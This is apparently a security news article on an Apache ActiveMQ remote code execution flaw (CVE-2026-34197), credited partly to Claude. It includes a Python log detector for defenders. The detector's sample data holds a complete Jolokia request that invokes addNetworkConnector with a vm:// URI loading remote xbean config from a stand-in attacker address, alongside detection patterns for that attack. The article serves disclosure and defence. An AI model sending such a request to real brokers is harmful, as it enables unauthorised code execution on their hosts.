In a striking development, researchers have uncovered a critical remote code execution (RCE) vulnerability in Apache ActiveMQ Classic—one that remained hidden for over 13 years. However, what makes this discovery even more remarkable is that Anthropic’s Claude AI model identified the flaw in under 10 minutes, dramatically accelerating traditional vulnerability research timelines.

The vulnerability, tracked as CVE-2026-34197, originates from improper input validation and code injection issues within ActiveMQ’s Jolokia JMX-HTTP bridge. This component is exposed via the web console endpoint /api/jolokia/ on port 8161. As a result, attackers with valid credentials can exploit this flaw by invoking the addNetworkConnector(String) function on the broker’s MBean.

Specifically, attackers can inject a malicious VM transport URI containing a crafted brokerConfig=xbean:http:// parameter. Consequently, when ActiveMQ processes this request, it dynamically creates an embedded broker using the attacker-controlled configuration. This behavior ultimately allows arbitrary operating system command execution through Spring’s XML processing mechanism.

Moreover, the root cause of this issue traces back to a previous fix for CVE-2022-41678. At that time, developers introduced a broad Jolokia allow rule for ActiveMQ’s internal MBeans to maintain web console functionality. Unfortunately, this decision unintentionally exposed sensitive management operations, including addNetworkConnector, thereby expanding the attack surface.

Although the vulnerability typically requires authentication, many enterprise environments still rely on default credentials such as admin:admin. Even more concerning, systems running ActiveMQ versions 6.0.0 through 6.1.1 face an unauthenticated attack path. Due to CVE-2024-32114, authentication checks were inadvertently removed from the /api/* endpoint, making exploitation significantly easier.

Historically, Apache ActiveMQ has been a frequent target for cyberattacks. Notably, previous vulnerabilities such as CVE-2016-3088 and CVE-2023-46604 are listed in CISA’s Known Exploited Vulnerabilities catalog, highlighting the platform’s ongoing security challenges.

Researchers at Horizon3.ai credited Claude AI for identifying this complex vulnerability chain. By leveraging a structured prompt and real-time validation, the AI successfully mapped interactions across Jolokia, JMX, and VM transport layers in minutes. Analysts emphasized that a human expert might have required an entire week to uncover the same attack path.

Mitigation Steps

To reduce risk while patches are rolled out, organizations should closely monitor ActiveMQ logs for suspicious vm:// URIs, unusual POST requests to /api/jolokia/, and unexpected outbound connections from the broker host. Additionally, defenders must watch for abnormal processes spawned by the ActiveMQ JVM.
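As an added illustration of the monitoring described above (this is example code written for this article, not code from Horizon3.ai or the Apache ActiveMQ project), the following Python scans constructed web-console request records and broker log lines for two of the signals the text names: POST requests to /api/jolokia/ whose Jolokia JSON body invokes addNetworkConnector, and vm:// URIs that carry a remote brokerConfig=xbean: reference. The record layout, the sample IP addresses, the broker log line format and the Finding type are assumptions made for the example; the Jolokia request shape (type, mbean, operation, arguments, with batches sent as a JSON list) is the standard Jolokia protocol.

```python
import json
import re
from dataclasses import dataclass
from typing import List

# Constructed sample data for the example (not real captured traffic).
# Each request record carries the client address, method, path and the
# raw POST body as the web-console access layer would see it.
SAMPLE_REQUESTS = [
    {"client": "203.0.113.7", "method": "POST", "path": "/api/jolokia/",
     "body": '{"type":"read","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
             '"attribute":"BrokerVersion"}'},
    {"client": "198.51.100.10", "method": "POST", "path": "/api/jolokia/",
     "body": '{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
             '"operation":"addNetworkConnector",'
             '"arguments":["vm://evil?brokerConfig=xbean:http://198.51.100.10/b.xml"]}'},
    {"client": "10.0.0.5", "method": "GET", "path": "/admin/queues.jsp", "body": ""},
]

# Constructed broker log lines; the layout is an assumption for the example.
SAMPLE_BROKER_LOG = [
    "2026-04-01 10:15:02,114 | INFO | Network connector tcp://10.0.0.9:61616 started",
    "2026-04-01 10:16:40,507 | INFO | Network connector "
    "vm://evil?brokerConfig=xbean:http://198.51.100.10/b.xml started",
]

JOLOKIA_PATH = re.compile(r"^/api/jolokia/?")
# Management operations that should never be reachable through the web console.
SENSITIVE_OPS = {"addNetworkConnector"}
# A vm:// transport URI whose brokerConfig points at a remote xbean document.
VM_XBEAN = re.compile(r"""vm://[^\s"']*brokerConfig=xbean:(?:https?|ftp)://[^\s"'|]*""",
                      re.IGNORECASE)


@dataclass
class Finding:
    source: str   # "access" (request log) or "broker" (broker log)
    reason: str
    detail: str


def inspect_jolokia_request(req: dict) -> List[Finding]:
    """Flag Jolokia POSTs that exec a sensitive MBean operation or pass a remote xbean URI."""
    findings: List[Finding] = []
    if req["method"] != "POST" or not JOLOKIA_PATH.match(req["path"]):
        return findings
    try:
        body = json.loads(req["body"]) if req["body"] else {}
    except json.JSONDecodeError:
        findings.append(Finding("access", "unparseable Jolokia body", req["body"][:80]))
        return findings
    # Jolokia bulk requests are a JSON list; normalise single requests to a list.
    ops = body if isinstance(body, list) else [body]
    for op in ops:
        if op.get("type") == "exec" and op.get("operation") in SENSITIVE_OPS:
            findings.append(Finding("access",
                                    f"exec of {op['operation']} from {req['client']}",
                                    op.get("mbean", "")))
        for arg in op.get("arguments") or []:
            if isinstance(arg, str) and VM_XBEAN.search(arg):
                findings.append(Finding("access", "vm:// URI with remote xbean brokerConfig", arg))
    return findings


def inspect_broker_log_line(line: str) -> List[Finding]:
    """Flag broker log lines that record a vm:// URI with a remote xbean brokerConfig."""
    m = VM_XBEAN.search(line)
    return [Finding("broker", "vm:// URI with remote xbean brokerConfig", m.group(0))] if m else []


def scan(requests: List[dict], broker_lines: List[str]) -> List[Finding]:
    """Run both detectors and return every finding."""
    findings: List[Finding] = []
    for req in requests:
        findings.extend(inspect_jolokia_request(req))
    for line in broker_lines:
        findings.extend(inspect_broker_log_line(line))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_REQUESTS, SAMPLE_BROKER_LOG):
        print(f"[{f.source}] {f.reason}: {f.detail}")
```

Run against the constructed samples, the benign read of BrokerVersion and the ordinary tcp:// network connector produce nothing, while the addNetworkConnector exec and the vm:// URI with a remote xbean reference are each reported. In a real deployment the request records would come from the web console's access logging and the broker lines from activemq.log; alerting on the exec operation alone is worthwhile even when the argument is not captured, since the fixed releases remove the ability to register VM transports through Jolokia at all.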

Importantly, Apache has released patches in versions 5.19.4 and 6.2.3. These updates eliminate the risky functionality that allowed VM transport registration via Jolokia. Therefore, organizations should immediately upgrade and audit all deployments, especially those using default credentials.
